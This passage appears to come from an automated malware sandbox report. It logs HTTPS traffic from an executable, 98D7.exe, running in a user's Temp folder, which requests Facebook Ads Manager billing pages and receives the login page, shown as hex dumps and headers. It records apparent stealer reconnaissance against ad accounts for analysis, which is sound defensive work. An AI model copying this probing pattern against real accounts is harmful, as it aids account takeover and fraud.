                                                                                    2023-02-07 18:46:13 UTC1204INData Raw: 22 65 66 5f 70 61 67 65 22 3a 6e 75 6c 6c 2c 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 7d 5d 5d 2c 5b 22 55 49 54 69 6e 79 56 69 65 77 70 6f 72 74 41 63 74 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22
                                                                                    Data Ascii: "ef_page":null,"uri":"https:\/\/www.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init"
                                                                                    2023-02-07 18:46:13 UTC1206INData Raw: 5f 70 72 22 7d 2c 6e 75 6c 6c 2c 74 72 75 65 2c 7b 22 70 75 62 4b 65 79 22 3a 7b 22 70 75 62 6c 69 63 4b 65 79 22 3a 22 64 30 65 62 33 63 36 39 35 37 62 61 66 39 65 34 35 39 34 65 65 64 38 31 64 35 31 37 64 33 34 62 32 61 36 64 32 61 30 61 31 34 35 30 34 34 30 62 35 61 66 65 61 32 62 65 33 61 65 65 33 62 37 36 22 2c 22 6b 65 79 49 64 22 3a 32 31 34 7d 7d 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 63 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 49 44 22 3a 22 65 6d 61 69 6c 22 2c 22 73 65 72 76 65 72 50 72 65 66 69 6c 6c 22 3a 22 22 7d 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67
                                                                                    Data Ascii: _pr"},null,true,{"pubKey":{"publicKey":"d0eb3c6957baf9e4594eed81d517d34b2a6d2a0a1450440b5afea2be3aee3b76","keyId":214}}]],["BrowserPrefillLogging","initContactpointFieldLogging",[],[{"contactpointFieldID":"email","serverPrefill":""}]],["BrowserPrefillLogg
                                                                                    2023-02-07 18:46:13 UTC1207INData Raw: 6d 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 38 67 22 7d 2c 66 61 6c 73 65 5d 5d 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 52 75 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 52 75 6e 29 7b 52 75 6e 2e 6f 6e 41 66 74 65 72 4c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 63 6c 65 61 6e 75 70 28 54 69 6d 65 53 6c 69 63 65 29 7d 29 7d 29 3b 7d 29 3b 0a 0a 6f 6e 6c 6f 61 64 52 65 67 69 73 74 65 72 5f 44 45 50 52 45 43 41 54 45 44 28 66 75 6e 63 74 69 6f 6e 20 28 29 7b 74 72 79 20 7b 20 24 28 22 65 6d 61 69 6c 22 29 2e 66 6f 63 75 73 28 29 3b 20 7d 20 63 61 74 63 68 20 28 5f 69 67 6e 6f 72 65 29 20 7b 20 7d 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 6e 6f 77 5f 69 6e 6c 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 3d 77 69
                                                                                    Data Ascii: m_9f5fac15_0_0_8g"},false]]});requireLazy(["Run"],function(Run){Run.onAfterLoad(function(){s.cleanup(TimeSlice)})});});onloadRegister_DEPRECATED(function (){try { $("email").focus(); } catch (_ignore) { }});</script><script>now_inl=(function(){var p=wi
                                                                                    2023-02-07 18:46:13 UTC1209INData Raw: 22 20 6e 6f 6e 63 65 3d 22 66 35 6a 46 52 35 43 4d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 52 2f 72 2f 6e 39 6b 74 7a 48 50 6b 6e 47 78 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 66 35 6a 46 52 35 43 4d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 2d 2f 72 2f 71 75 39 76 69 2d 62 6d 57 6c 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57
                                                                                    Data Ascii: " nonce="f5jFR5CM" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yR/r/n9ktzHPknGx.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="f5jFR5CM" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y-/r/qu9vi-bmWl3.js?_nc_x=Ij3W
                                                                                    2023-02-07 18:46:13 UTC1210INData Raw: 73 41 30 61 22 2c 22 69 48 67 4a 66 33 46 22 2c 22 63 36 6b 70 52 4b 63 22 2c 22 45 77 4b 73 53 72 48 22 2c 22 6d 73 4d 63 64 31 30 22 2c 22 35 70 39 4a 67 64 39 22 2c 22 44 61 36 72 4c 36 6b 22 2c 22 66 6f 7a 37 6e 77 37 22 2c 22 43 55 70 44 4d 65 31 22 2c 22 42 6e 62 61 6a 53 37 22 2c 22 37 54 56 58 70 4f 79 22 2c 22 66 68 5a 54 5a 64 78 22 2c 22 7a 2f 41 4f 4d 42 6d 22 2c 22 30 37 49 69 57 42 2f 22 2c 22 33 6d 63 36 79 62 76 22 2c 22 2f 72 4f 30 6c 62 6e 22 2c 22 50 2f 6d 72 35 56 45 22 2c 22 67 6f 49 43 31 36 6a 22 2c 22 34 44 78 73 6d 66 55 22 2c 22 64 4b 50 4a 62 71 4a 22 2c 22 58 61 67 66 70 4e 43 22 2c 22 4a 35 68 34 77 4a 73 22 2c 22 48 4e 34 67 55 69 68 22 2c 22 54 6a 59 61 35 7a 4d 22 2c 22 79 53 65 57 37 48 67 22 2c 22 7a 50 4c 67 49 47 54 22
                                                                                    Data Ascii: sA0a","iHgJf3F","c6kpRKc","EwKsSrH","msMcd10","5p9Jgd9","Da6rL6k","foz7nw7","CUpDMe1","BnbajS7","7TVXpOy","fhZTZdx","z/AOMBm","07IiWB/","3mc6ybv","/rO0lbn","P/mr5VE","goIC16j","4DxsmfU","dKPJbqJ","XagfpNC","J5h4wJs","HN4gUih","TjYa5zM","ySeW7Hg","zPLgIGT"
                                                                                    2023-02-07 18:46:13 UTC1211INData Raw: 31 32 39 30 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 66 35 6a 46 52 35 43 4d 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 66 35 6a 46 52 35 43 4d 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                    Data Ascii: 1290<script nonce="f5jFR5CM">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="f5jFR5CM">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                    2023-02-07 18:46:13 UTC1212INData Raw: 77 39 4b 6f 5f 34 38 77 57 55 77 36 61 54 30 51 48 71 73 32 62 77 5f 78 6f 70 6b 69 33 38 75 6a 5f 6a 4d 72 6c 6f 45 54 44 71 4d 62 6a 33 33 36 46 67 4f 38 43 35 4c 63 68 4d 50 4d 31 42 42 5a 6c 49 72 47 52 6d 7a 34 44 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 32 55 62 75 49 6a 51 52 67 33 4b 74 36 46 6b 77 39 4b 6f 5f 34 38 77 57 55 77 36 61 54 30 51 48 71 73 32 62 77 5f 78 6f 70 6b 69 33 38 75 6a 5f 6a 4d 72 6c 6f 45 54 44 71 4d 62 6a 33 33 36 46 67 4f 38 43 35 4c 63 68 4d 50 4d 31 42 42 5a 6c 49 72 47 52 6d 7a 34 44 4d 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                    Data Ascii: w9Ko_48wWUw6aT0QHqs2bw_xopki38uj_jMrloETDqMbj336FgO8C5LchMPM1BBZlIrGRmz4DM"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa2UbuIjQRg3Kt6Fkw9Ko_48wWUw6aT0QHqs2bw_xopki38uj_jMrloETDqMbj336FgO8C5LchMPM1BBZlIrGRmz4DM"]},-1],["cr:1083117",[],{
                                                                                    2023-02-07 18:46:13 UTC1213INData Raw: 58 52 74 4b 4b 71 43 6c 77 54 6e 4c 61 77 33 36 31 50 30 2d 50 4b 4d 77 70 72 66 72 49 6f 70 7a 4b 32 31 68 30 4a 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65
                                                                                    Data Ascii: XRtKKqClwTnLaw361P0-PKMwprfrIopzK21h0Jw"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_e
                                                                                    2023-02-07 18:46:13 UTC1215INData Raw: 6b 42 31 74 73 2d 4b 52 64 34 65 58 52 74 4b 4b 71 43 6c 77 54 6e 4c 61 77 33 36 31 50 30 2d 50 4b 4d 77 70 72 66 72 49 6f 70 7a 4b 32 31 68 30 4a 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 30 38 4e 61 4a 63 57 34 6b 47 53 79 49 4a 5a 61 37 31 6e 4b 49 7a 65 79 70 49 79 61 2d 41 6b 42 31 74 73 2d 4b 52 64 34 65 58 52 74 4b 4b 71 43 6c 77 54 6e 4c 61 77 33 36 31 50 30 2d 50 4b 4d 77 70 72 66 72 49 6f 70 7a 4b 32 31 68 30 4a 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 35 32 37 38 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61 30 5f 6e 71 59 6e 59
                                                                                    Data Ascii: kB1ts-KRd4eXRtKKqClwTnLaw361P0-PKMwprfrIopzK21h0Jw"]},-1],["cr:983844",[],{__rc:[null,"Aa08NaJcW4kGSyIJZa71nKIzeypIya-AkB1ts-KRd4eXRtKKqClwTnLaw361P0-PKMwprfrIopzK21h0Jw"]},-1],["cr:5278",["ReactDOM-prod.classic"],{__rc:["ReactDOM-prod.classic","Aa0_nqYnY
                                                                                    2023-02-07 18:46:13 UTC1216INData Raw: 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 4e 61 76 69 67 61 74 69 6f 6e 4d 65 74 72 69 63 73 22 2c 22 73 65 74 50 61 67 65 22 2c 5b 5d 2c 5b 7b 70 61 67 65 3a 22 2f 6c 6f 67 69 6e 2e 70 68 70 22 2c 70 61 67 65 5f 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 70 61 67 65 5f 75 72 69 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 2c 73 65 72 76 65 72 4c 49 44 3a
                                                                                    Data Ascii: ,[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    15192.168.2.349744157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:14 UTC1218OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:14 UTC1219INHTTP/1.1 302 Found
                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-resource-policy: same-origin
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: X41Zb/A51W+Ix10hPb1CX5yGmExTVR+XPmf4SbaX28flnYLbN6XBeqQsXqPvSlWhE7iEErrxIQKkb3sV3FZJog==
                                                                                    Date: Tue, 07 Feb 2023 18:46:14 GMT
                                                                                    2023-02-07 18:46:14 UTC1221INData Raw: 50 72 69 6f 72 69 74 79 3a 20 75 3d 33 2c 69 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 0d 0a
                                                                                    Data Ascii: Priority: u=3,iAlt-Svc: h3=":443"; ma=86400Connection: closeContent-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    16192.168.2.349745157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:15 UTC1221OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:15 UTC1222INHTTP/1.1 200 OK
                                                                                    Vary: Accept-Encoding
                                                                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: pA0CK6IrDm5HadTYMZxB/QKo0CHCFayQ09ZTJtZAOfcjh9Lo/LEDqNN1Dz/YpgZ90BF4AVWneFzlY8CGdKYedQ==
                                                                                    2023-02-07 18:46:15 UTC1224INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 31 35 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:15 GMTTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
                                                                                    2023-02-07 18:46:15 UTC1224INData Raw: 65 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 43 75 67 58 54 72 45 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b
                                                                                    Data Ascii: e45<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="2CugXTrE">function envFlush(a){function b(b){for(var c in a)b[c]=a[
                                                                                    2023-02-07 18:46:15 UTC1225INData Raw: 65 65 20 70 6f 73 74 73 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 6d 6f 72 65 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 76 2f 72 2f 42 38 42 78 73 73 63 66 56 42 72 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 52 73 70 77 45 31 55 59 4c 77 72 2e 63 73 73 3f 5f 6e 63 5f 78 3d
                                                                                    Data Ascii: ee posts, photos and more on Facebook." /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=
                                                                                    2023-02-07 18:46:15 UTC1227INData Raw: 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 38 31 34 38 35 32 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 33 38 31 34 32 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 2c 22 31 39 34 39 38 39 38 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 34 38 38 31 35 22 3a 7b 22 72 22 3a 31 30 30 30 30 2c 22 73 22 3a 31 7d 2c 22 31 37 34 34 31 37 38 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 36 37 36 38 33 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 4e 38 77 42 5a 41 38 63 74 43 64 48 77 37 79 38 22 7d 2c 22 36 37 36 39 32 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a
                                                                                    Data Ascii: pportData"],function(m){m.handle({"clpData":{"1814852":{"r":1},"1838142":{"r":1,"s":1},"1949898":{"r":1},"1848815":{"r":10000,"s":1},"1744178":{"r":1,"s":1}},"gkxData":{"676837":{"result":false,"hash":"AT4N8wBZA8ctCdHw7y8"},"676920":{"result":true,"hash":
